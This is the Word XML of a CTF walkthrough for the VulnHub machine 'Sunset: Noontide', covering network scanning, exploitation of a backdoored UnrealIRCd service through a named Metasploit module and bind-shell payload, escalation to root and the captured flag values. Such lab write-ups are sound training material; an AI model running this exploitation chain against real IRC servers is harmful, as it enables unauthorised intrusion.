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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:id w:val="-1098705477"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Cover Pages"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="06C9B06D" w14:textId="75692F23" w:rsidR="008D6BB5" w:rsidRDefault="008D6BB5">
          <w:pPr>
            <w:pStyle w:val="NoSpacing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2820225" wp14:editId="5098EFED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3-18T00:00:00Z">
                                      <w:dateFormat w:val="M/d/yyyy"/>
                                      <w:lid w:val="en-U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4D850C0" w14:textId="52D917F5" w:rsidR="008D6BB5" w:rsidRDefault="00791A99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3/18/2026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2820225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3-18T00:00:00Z">
                                <w:dateFormat w:val="M/d/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74D850C0" w14:textId="52D917F5" w:rsidR="008D6BB5" w:rsidRDefault="00791A99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3/18/2026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6393091" wp14:editId="2B08F08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D33FC4" w14:textId="798649CE" w:rsidR="008D6BB5" w:rsidRDefault="00000000">
                                <w:pPr>
                                  <w:pStyle w:val="NoSpacing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h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YUVARAJ M</w:t>
                                    </w:r>
                                  </w:sdtContent>
                                </w:sdt>
                              </w:p>
                              <w:p w14:paraId="3C422243" w14:textId="7F72E7B9" w:rsidR="008D6BB5" w:rsidRDefault="00000000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ny"/>
                                    <w:tag w:val=""/>
                                    <w:id w:val="1558814826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39309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DD33FC4" w14:textId="798649CE" w:rsidR="008D6BB5" w:rsidRDefault="00000000">
                          <w:pPr>
                            <w:pStyle w:val="NoSpacing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h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YUVARAJ M</w:t>
                              </w:r>
                            </w:sdtContent>
                          </w:sdt>
                        </w:p>
                        <w:p w14:paraId="3C422243" w14:textId="7F72E7B9" w:rsidR="008D6BB5" w:rsidRDefault="00000000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ny"/>
                              <w:tag w:val=""/>
                              <w:id w:val="1558814826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D6BB5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0FF9028" wp14:editId="374A1BB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7A056F" w14:textId="5252F6C5" w:rsidR="008D6BB5" w:rsidRDefault="00000000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Challenge-0</w:t>
                                    </w:r>
                                    <w:r w:rsidR="00791A99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9</w:t>
                                    </w:r>
                                  </w:sdtContent>
                                </w:sdt>
                              </w:p>
                              <w:p w14:paraId="5C2F60A5" w14:textId="315A5F85" w:rsidR="008D6BB5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Solving CTF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Machines</w:t>
                                    </w:r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from</w:t>
                                    </w:r>
                                    <w:r w:rsidR="008D6BB5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r w:rsidR="00C57F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VulnHub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0FF9028" id="Text Box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587A056F" w14:textId="5252F6C5" w:rsidR="008D6BB5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Challenge-0</w:t>
                              </w:r>
                              <w:r w:rsidR="00791A99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9</w:t>
                              </w:r>
                            </w:sdtContent>
                          </w:sdt>
                        </w:p>
                        <w:p w14:paraId="5C2F60A5" w14:textId="315A5F85" w:rsidR="008D6BB5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Solving CTF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Machines</w:t>
                              </w:r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from</w:t>
                              </w:r>
                              <w:r w:rsidR="008D6BB5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r w:rsidR="00C57F5F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VulnHub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C273BDB" w14:textId="5129961A" w:rsidR="00C57F5F" w:rsidRPr="00C57F5F" w:rsidRDefault="00C57F5F" w:rsidP="00C57F5F">
          <w:pPr>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:color w:val="4472C4" w:themeColor="accent1"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/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565334B" wp14:editId="04032530">
                    <wp:simplePos x="0" y="0"/>
                    <wp:positionH relativeFrom="column">
                      <wp:posOffset>2148840</wp:posOffset>
                    </wp:positionH>
                    <wp:positionV relativeFrom="paragraph">
                      <wp:posOffset>2000885</wp:posOffset>
                    </wp:positionV>
                    <wp:extent cx="3596640" cy="4998720"/>
                    <wp:effectExtent l="0" t="0" r="3810" b="0"/>
                    <wp:wrapNone/>
                    <wp:docPr id="24009378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596640" cy="499872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7F6196" w14:textId="77777777" w:rsidR="00785791" w:rsidRPr="00785791" w:rsidRDefault="00785791" w:rsidP="00785791">
                                <w:pPr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</w:pPr>
                                <w:r w:rsidRPr="00785791">
                                  <w:rPr>
                                    <w:b/>
                                    <w:bCs/>
                                    <w:sz w:val="40"/>
                                    <w:szCs w:val="40"/>
                                  </w:rPr>
                                  <w:t>Sunset: Noontide Walkthrough</w:t>
                                </w:r>
                              </w:p>
                              <w:p w14:paraId="1E584595" w14:textId="77777777" w:rsidR="00C57F5F" w:rsidRPr="00C57F5F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Platform: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VulnHub</w:t>
                                </w:r>
                              </w:p>
                              <w:p w14:paraId="68829560" w14:textId="532294EE" w:rsidR="00130FA5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Category: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Boot2Root / </w:t>
                                </w:r>
                                <w:r w:rsidR="00130FA5" w:rsidRPr="00130FA5">
                                  <w:rPr>
                                    <w:sz w:val="28"/>
                                    <w:szCs w:val="28"/>
                                  </w:rPr>
                                  <w:t xml:space="preserve">Linux </w:t>
                                </w:r>
                                <w:r w:rsidR="00785791">
                                  <w:rPr>
                                    <w:sz w:val="28"/>
                                    <w:szCs w:val="28"/>
                                  </w:rPr>
                                  <w:t>Exploitation</w:t>
                                </w:r>
                              </w:p>
                              <w:p w14:paraId="27CCCE71" w14:textId="24839F4A" w:rsidR="00C57F5F" w:rsidRPr="00C57F5F" w:rsidRDefault="00C57F5F" w:rsidP="00C57F5F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C57F5F">
                                  <w:rPr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Difficulty:</w:t>
                                </w:r>
                                <w:r w:rsidRPr="00C57F5F">
                                  <w:rPr>
                                    <w:sz w:val="28"/>
                                    <w:szCs w:val="28"/>
                                  </w:rPr>
                                  <w:t xml:space="preserve"> Easy</w:t>
                                </w:r>
                              </w:p>
                              <w:p w14:paraId="77188C4E" w14:textId="77777777" w:rsidR="00C57F5F" w:rsidRDefault="00C57F5F" w:rsidP="00C57F5F"/>
                              <w:p w14:paraId="0CD3B38F" w14:textId="72CFE6C0" w:rsidR="00C57F5F" w:rsidRDefault="00C57F5F" w:rsidP="00C57F5F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565334B" id="_x0000_s1057" type="#_x0000_t202" style="position:absolute;margin-left:169.2pt;margin-top:157.55pt;width:283.2pt;height:393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g7JMAIAAFwEAAAOAAAAZHJzL2Uyb0RvYy54bWysVEuP2jAQvlfqf7B8LwEW6BIRVpQVVSW0&#10;uxJb7dk4NrHkeFzbkNBf37HDq9ueql6cGc94Ht83k9lDW2tyEM4rMAUd9PqUCMOhVGZX0O+vq0/3&#10;lPjATMk0GFHQo/D0Yf7xw6yxuRhCBboUjmAQ4/PGFrQKweZZ5nklauZ7YIVBowRXs4Cq22WlYw1G&#10;r3U27PcnWQOutA648B5vHzsjnaf4UgoenqX0IhBdUKwtpNOlcxvPbD5j+c4xWyl+KoP9QxU1UwaT&#10;XkI9ssDI3qk/QtWKO/AgQ49DnYGUiovUA3Yz6L/rZlMxK1IvCI63F5j8/wvLnw4b++JIaL9AiwRG&#10;QBrrc4+XsZ9Wujp+sVKCdoTweIFNtIFwvLwbTyeTEZo42kbT6f3nYQI2uz63zoevAmoShYI65CXB&#10;xQ5rHzAlup5dYjYPWpUrpXVS4iyIpXbkwJBFHVKR+OI3L21IU9DJ3bifAhuIz7vI2mCCa1NRCu22&#10;JarE2s8Nb6E8Ig4OuhHxlq8U1rpmPrwwhzOB/eGch2c8pAbMBSeJkgrcz7/dR3+kCq2UNDhjBfU/&#10;9swJSvQ3gyROB6MIW0jKaBxhI+7Wsr21mH29BARggBtleRKjf9BnUTqo33AdFjErmpjhmLug4Swu&#10;Qzf5uE5cLBbJCcfQsrA2G8tj6Ah4ZOK1fWPOnugKyPQTnKeR5e9Y63zjSwOLfQCpEqUR5w7VE/w4&#10;wonp07rFHbnVk9f1pzD/BQAA//8DAFBLAwQUAAYACAAAACEAJIQsBuIAAAAMAQAADwAAAGRycy9k&#10;b3ducmV2LnhtbEyPy07DMBBF90j8gzVIbBC107RQQpwKIR4SOxoeYufGQxIRj6PYTcLfM6xgN6M5&#10;unNuvp1dJ0YcQutJQ7JQIJAqb1uqNbyU9+cbECEasqbzhBq+McC2OD7KTWb9RM847mItOIRCZjQ0&#10;MfaZlKFq0Jmw8D0S3z794EzkdailHczE4a6TS6UupDMt8YfG9HjbYPW1OzgNH2f1+1OYH16ndJ32&#10;d49jeflmS61PT+abaxAR5/gHw68+q0PBTnt/IBtEpyFNNytGeUjWCQgmrtSKy+wZTdQyBVnk8n+J&#10;4gcAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0Nv&#10;bnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAALAAAAAAAAAAAAAAAA&#10;AC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAJag7JMAIAAFwEAAAOAAAAAAAAAAAAAAAA&#10;AC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQAkhCwG4gAAAAwBAAAPAAAAAAAAAAAA&#10;AAAAAIoEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAmQUAAAAA&#10;" fillcolor="white [3201]" stroked="f" strokeweight=".5pt">
                    <v:textbox>
                      <w:txbxContent>
                        <w:p w14:paraId="197F6196" w14:textId="77777777" w:rsidR="00785791" w:rsidRPr="00785791" w:rsidRDefault="00785791" w:rsidP="00785791">
                          <w:pPr>
                            <w:rPr>
                              <w:b/>
                              <w:bCs/>
                              <w:sz w:val="40"/>
                              <w:szCs w:val="40"/>
                            </w:rPr>
                          </w:pPr>
                          <w:r w:rsidRPr="00785791">
                            <w:rPr>
                              <w:b/>
                              <w:bCs/>
                              <w:sz w:val="40"/>
                              <w:szCs w:val="40"/>
                            </w:rPr>
                            <w:t>Sunset: Noontide Walkthrough</w:t>
                          </w:r>
                        </w:p>
                        <w:p w14:paraId="1E584595" w14:textId="77777777" w:rsidR="00C57F5F" w:rsidRPr="00C57F5F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Platform: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VulnHub</w:t>
                          </w:r>
                        </w:p>
                        <w:p w14:paraId="68829560" w14:textId="532294EE" w:rsidR="00130FA5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Category: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Boot2Root / </w:t>
                          </w:r>
                          <w:r w:rsidR="00130FA5" w:rsidRPr="00130FA5">
                            <w:rPr>
                              <w:sz w:val="28"/>
                              <w:szCs w:val="28"/>
                            </w:rPr>
                            <w:t xml:space="preserve">Linux </w:t>
                          </w:r>
                          <w:r w:rsidR="00785791">
                            <w:rPr>
                              <w:sz w:val="28"/>
                              <w:szCs w:val="28"/>
                            </w:rPr>
                            <w:t>Exploitation</w:t>
                          </w:r>
                        </w:p>
                        <w:p w14:paraId="27CCCE71" w14:textId="24839F4A" w:rsidR="00C57F5F" w:rsidRPr="00C57F5F" w:rsidRDefault="00C57F5F" w:rsidP="00C57F5F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C57F5F">
                            <w:rPr>
                              <w:b/>
                              <w:bCs/>
                              <w:sz w:val="28"/>
                              <w:szCs w:val="28"/>
                            </w:rPr>
                            <w:t>Difficulty:</w:t>
                          </w:r>
                          <w:r w:rsidRPr="00C57F5F">
                            <w:rPr>
                              <w:sz w:val="28"/>
                              <w:szCs w:val="28"/>
                            </w:rPr>
                            <w:t xml:space="preserve"> Easy</w:t>
                          </w:r>
                        </w:p>
                        <w:p w14:paraId="77188C4E" w14:textId="77777777" w:rsidR="00C57F5F" w:rsidRDefault="00C57F5F" w:rsidP="00C57F5F"/>
                        <w:p w14:paraId="0CD3B38F" w14:textId="72CFE6C0" w:rsidR="00C57F5F" w:rsidRDefault="00C57F5F" w:rsidP="00C57F5F"/>
                      </w:txbxContent>
                    </v:textbox>
                  </v:shape>
                </w:pict>
              </mc:Fallback>
            </mc:AlternateContent>
          </w:r>
          <w:r w:rsidR="008D6BB5">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:color w:val="4472C4" w:themeColor="accent1"/>
            </w:rPr>
            <w:br w:type="page"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="6D2FB26A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Sunset: Noontide Walkthrough</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DC6EE3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Platform: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VulnHub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</w:r>
      <w:r w:rsidRPr="00785791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Category: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Boot2Root / Linux Exploitation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</w:r>
      <w:r w:rsidRPr="00785791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Difficulty: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Easy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7896E755" w14:textId="21F2CDD2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5035A529" w14:textId="256B1EFF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 w:bidi="kn-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1990ED69" wp14:editId="0DC78743">
            <wp:extent cx="5731510" cy="2764155"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="12943592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35928" name="Picture 12943592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DE458" w14:textId="7ACEBB77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0FDE4A0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Challenge Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5738B41A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Sunset: Noontide is a vulnerable Linux virtual machine from the VulnHub platform designed to test penetration testing skills such as network enumeration, service exploitation, and privilege escalation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35622B87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objective of this challenge is to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122CAAF8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Perform network discovery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Identify open services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Exploit vulnerable services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Gain initial shell access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Escalate privileges to root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Capture user and root flags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A7A62A" w14:textId="67FABDB0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0BD16779" w14:textId="77777777" w:rsid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kn-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="789E6A54" w14:textId="46281C45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Target Information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1849"/>
      </w:tblGrid>
      <w:tr w:rsidR="00785791" w:rsidRPr="00785791" w14:paraId="02EE3B50" w14:textId="77777777" w:rsidTr="007857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6206E2" w14:textId="77777777" w:rsidR="00785791" w:rsidRPr="00785791" w:rsidRDefault="00785791" w:rsidP="00785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7BAEFB5E" w14:textId="77777777" w:rsidR="00785791" w:rsidRPr="00785791" w:rsidRDefault="00785791" w:rsidP="00785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Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00785791" w:rsidRPr="00785791" w14:paraId="20856C13" w14:textId="77777777" w:rsidTr="007857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630C7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5369E510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VulnHub</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00785791" w:rsidRPr="00785791" w14:paraId="237CD8C3" w14:textId="77777777" w:rsidTr="007857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FD438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Machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5DCD2E7A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Sunset: Noontide</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00785791" w:rsidRPr="00785791" w14:paraId="40AAFE06" w14:textId="77777777" w:rsidTr="007857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46D89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Target IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="643AD930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172.20.10.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00785791" w:rsidRPr="00785791" w14:paraId="649875A2" w14:textId="77777777" w:rsidTr="007857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0021F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7EBE4636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Linux</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00785791" w:rsidRPr="00785791" w14:paraId="3FACA6CC" w14:textId="77777777" w:rsidTr="007857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5B6F8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Access Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52A9303E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IRC Exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D87A5A4" w14:textId="194BF3B7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37EA73FF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Enumeration Phase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3870DB4C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Step 1 — </w:t>
      </w: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Network Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C99CE65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 used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138FE617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sudo arp-scan -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127ABB54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Target identified:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0971371F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172.20.10.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575C5D2D" w14:textId="458B56D4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0D8EDE6E" wp14:editId="38EBD412">
            <wp:extent cx="5731510" cy="2448560"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="142359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920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</w:r>
    </w:p>
    <w:p w14:paraId="0D6F7B0A" w14:textId="686F8DEE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08CFF37F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kn-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2 — </w:t>
      </w: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Port Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBCFFD7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 used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AFB77D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nmap -sC -sV -A 172.20.10.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151F3531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27"/>
          <w:szCs w:val="27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27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Open Ports Identified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5"/>
        <w:gridCol w:w="827"/>
        <w:gridCol w:w="1376"/>
      </w:tblGrid>
      <w:tr w:rsidR="00785791" w:rsidRPr="00785791" w14:paraId="49F913DD" w14:textId="77777777" w:rsidTr="007857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485929" w14:textId="77777777" w:rsidR="00785791" w:rsidRPr="00785791" w:rsidRDefault="00785791" w:rsidP="00785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17917B39" w14:textId="77777777" w:rsidR="00785791" w:rsidRPr="00785791" w:rsidRDefault="00785791" w:rsidP="00785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433100D0" w14:textId="77777777" w:rsidR="00785791" w:rsidRPr="00785791" w:rsidRDefault="00785791" w:rsidP="00785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Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00785791" w:rsidRPr="00785791" w14:paraId="3D7646D2" w14:textId="77777777" w:rsidTr="007857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BD921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6667</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7145AAA4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IRC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18B045E6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UnrealIRCd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00785791" w:rsidRPr="00785791" w14:paraId="5F7E8E3C" w14:textId="77777777" w:rsidTr="007857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7BDF4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6697</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B8F2769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IRC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DE7C508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UnrealIRCd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00785791" w:rsidRPr="00785791" w14:paraId="2B7CCB40" w14:textId="77777777" w:rsidTr="007857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374D5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8067</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C45CB7A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IRC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C9BAE5B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UnrealIRCd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6D8E2931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This indicates the system is running an </w:t>
      </w:r>
      <w:r w:rsidRPr="00785791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IRC service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, which is often a target for known exploits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CF3FEE" w14:textId="4BDA7CFB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17F983ED" wp14:editId="49A19039">
            <wp:extent cx="5731510" cy="1343025"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="13742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935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43C25" w14:textId="1AA4E457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17141124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Vulnerability Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E2574D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During research, the IRC service was identified as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413C0FA2" w14:textId="63CFC9B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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00785791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UnrealIRCd 3.2.8.1 (Backdoored version)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3830963D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This version contains a known backdoor vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B007A93" w14:textId="1A249B12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 w:bidi="kn-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="095DCDBF" wp14:editId="61F1A158">
            <wp:extent cx="5731510" cy="2773045"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="1445031701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031701" name="Picture 144503170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B4022" w14:textId="2741E313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59880CF3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Exploitation Phase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5365B3BF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Using Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAD8EAF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Metasploit was used to exploit the backdoor vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4047C9C8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Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D14E163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msfconsole</w:t>
      </w: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use exploit/unix/irc/unreal_ircd_3281_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451763BD" w14:textId="49E4E9A1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IN" w:bidi="kn-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DE3A099" wp14:editId="506586CF">
            <wp:extent cx="5731510" cy="3000375"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="191245399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453998" name="Picture 191245399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A1C28" w14:textId="25B105ED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4F703D8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Configuring the Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435B6317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Set target IP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F5394E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set RHOSTS 172.20.10.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A437E9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View payloads:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64019F90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show payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5340D0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Select payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEA3BCF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set payload cmd/unix/bind_perl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0562A5" w14:textId="3CD7417B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28F7E693" wp14:editId="3D712470">
            <wp:extent cx="5731510" cy="4232275"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1294687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6873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623E4" w14:textId="133D2D84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63BBB466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0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Running the Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33048D57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50AF05BE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exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657C1A45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exploit successfully connected and opened a shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A74EC64" w14:textId="1D80F3AF" w:rsidR="00785791" w:rsidRPr="00785791" w:rsidRDefault="00791A99" w:rsidP="00791A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79298D9D" wp14:editId="20314717">
            <wp:extent cx="5731510" cy="2611120"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="642281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815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D7CF7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Gaining Initial Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECFD1E4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After exploitation, a shell session was obtained.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B40094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Verification:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2587050F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id</w:t>
      </w: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whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D9DB61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Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC1E44B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server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285FD2BC" w14:textId="7186D9FA" w:rsidR="00785791" w:rsidRPr="00785791" w:rsidRDefault="00791A99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5D654188" wp14:editId="70C58F8C">
            <wp:extent cx="5731510" cy="2800985"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="702941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413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46B1" w14:textId="225BBB64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2DB8F0AF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Retrieving User Flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF63122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Navigated to home directory:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C7AABC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cd /home/server</w:t>
      </w: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ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EDCFC8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Found file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7548EB31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local.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0973B835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376E710B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cat local.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CA1F77" w14:textId="77777777" w:rsidR="00791A99" w:rsidRDefault="00791A99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22F377C8" w14:textId="6620E3A5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lastRenderedPageBreak/>
        <w:t>User flag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714703C0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c53c08b5bf2b0801c5d0c24149826a6e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C67E39F" w14:textId="68E281E1" w:rsidR="00785791" w:rsidRPr="00785791" w:rsidRDefault="00791A99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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="549D8F9F" wp14:editId="0EF1D9CA">
            <wp:extent cx="5731510" cy="2858135"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="90976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634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22CD" w14:textId="3430B270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607FCB8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Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B770E6A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shell allowed switching to root directly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1170BDD2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2D2ED571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su root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BF13B5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Successfully escalated privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556407C8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Verification:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798B5566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whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715830C6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Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F540C8C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root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36723100" w14:textId="1D541270" w:rsidR="00785791" w:rsidRPr="00785791" w:rsidRDefault="00791A99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3D541F0A" wp14:editId="1144121B">
            <wp:extent cx="5731510" cy="2529840"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="680771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714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942E" w14:textId="4B3A34A0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11797FA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Retrieving Root Flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312E47E9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Navigate to root directory:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5789734F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cd /root</w:t>
      </w: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br/>
        <w:t>ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F198A58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Found file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DD3A59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proof.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F141CC8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Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A10432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cat proof.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192A95FC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Root flag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C89149" w14:textId="77777777" w:rsidR="00785791" w:rsidRPr="00785791" w:rsidRDefault="00785791" w:rsidP="007857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</w:pPr>
      <w:r w:rsidRPr="00785791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 w:bidi="kn-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>ab28c8ca8da1b9ffc2d702ac54221105</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567A46FE" w14:textId="2238C6DF" w:rsidR="00785791" w:rsidRPr="00785791" w:rsidRDefault="00791A99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77321CAB" wp14:editId="5882CD25">
            <wp:extent cx="5361905" cy="3257143"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="75862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26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61905" cy="3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25993" w14:textId="1301B1F9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1332FB8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Flags Captured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3882"/>
      </w:tblGrid>
      <w:tr w:rsidR="00785791" w:rsidRPr="00785791" w14:paraId="0CBB590B" w14:textId="77777777" w:rsidTr="007857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BAA572" w14:textId="77777777" w:rsidR="00785791" w:rsidRPr="00785791" w:rsidRDefault="00785791" w:rsidP="00785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Flag</w:t>
            </w:r>
          </w:p>
